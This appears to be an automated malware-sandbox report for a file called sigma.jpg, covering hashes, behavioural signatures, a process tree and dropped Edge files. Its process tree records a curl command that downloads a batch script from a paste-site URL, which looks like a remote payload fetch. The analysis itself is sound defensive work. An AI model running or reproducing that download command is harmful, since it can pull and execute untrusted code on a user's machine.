Overview

overview

3

Static

static

1

sigma.jpg

windows7-x64

3

sigma.jpg

windows10-2004-x64

3

Analysis

  • max time kernel
    534s
  • max time network
    543s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/04/2024, 11:54

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    sigma.jpg

  • Size

    93KB

  • MD5

    a8e3c218634d2cd583cda6b683d53711

  • SHA1

    83f34f0029e5740006f1e62c7adffa2d3c6bdecb

  • SHA256

    b5461329d53c57f03d3287042e047874cf160bf05522aca40fb540c7ec4149f4

  • SHA512

    039dca0f4f3aad6e60ffc3e61c7e32c52d6f02fb60d4dc6bddb1518ec9dc0a2c73e64d530e180c55b5bff84a11bf791de5cc7bedc777e97cfb4a77a23afa5e37

  • SSDEEP

    1536:SZg/UZP4o3wXdLVRqWe97TkQuPkryZciglCvnsgaFySqcXyXTGfVl7z4nhzHj:SZ+cP58re97AwrpBFiFj8MnJj

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\sigma.jpg
    1⤵
      PID:2684
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      1⤵
        PID:1756
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Windows\system32\curl.exe
          curl -o sx.bat "https://rentry.co/cooliouzpn/raw"
          2⤵
            PID:2800
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault92c2ac03h2b44h4af2hbd14h8d48d5b7d066
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1256
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe2c7c46f8,0x7ffe2c7c4708,0x7ffe2c7c4718
            2⤵
              PID:464
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,13654086887498215133,3535951024650747096,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
              2⤵
                PID:2708
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,13654086887498215133,3535951024650747096,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4536
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,13654086887498215133,3535951024650747096,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
                2⤵
                  PID:1084

              Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                      Filesize

                      152B

                      MD5

                      fbe1ce4d182aaffb80de94263be1dd35

                      SHA1

                      bc6c9827aa35a136a7d79be9e606ff359e2ac3ea

                      SHA256

                      0021f72dbca789f179762b0e17c28fe0b93a12539b08294800e47469905aeb51

                      SHA512

                      3fb0a3b38e7d4a30f5560594b1d14e6e58419e274255fb68dfe0ca897aa181f9ce8cb2048403f851fd36a17b0e34d272d03927769d41a500b2fe64806354902f

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                      Filesize

                      61B

                      MD5

                      4df4574bfbb7e0b0bc56c2c9b12b6c47

                      SHA1

                      81efcbd3e3da8221444a21f45305af6fa4b71907

                      SHA256

                      e1b77550222c2451772c958e44026abe518a2c8766862f331765788ddd196377

                      SHA512

                      78b14f60f2d80400fe50360cf303a961685396b7697775d078825a29b717081442d357c2039ad0984d4b622976b0314ede8f478cde320daec118da546cb0682a

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                      Filesize

                      6KB

                      MD5

                      c32181369367ef1006859b85eedf6f8b

                      SHA1

                      4c9617bda28f23f688e0781ed52e2f50799db28c

                      SHA256

                      c91c758d8d16e31a1ca402112b51b62471551750c362d179ea13dca45f48de37

                      SHA512

                      a35c67de906b0d4f05c6713def5ec635f3ec8e06745799b7c90776adf8c7566060959151a6f9590383db5c01143f7886fd413c4bd75b7cb59789177dda7fe609

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                      Filesize

                      8KB

                      MD5

                      d87a9b1b001879ab511e058ceb97a465

                      SHA1

                      23a6141a7517a0cd1540dcaba440cccb4d68e40b

                      SHA256

                      1725692c98da6cff76173feadae817b814ecbf76a939ff1fce1829f5dd3fac5b

                      SHA512

                      e008e3076db5532531a2bf515cb13963dcd1f3d0f7ad4348fa3bb757b078d34ee0292a0ba646a49ea60ebe065269ff91f0ab68b391c24d6eb41cb141be1f2df4

                      Download Submit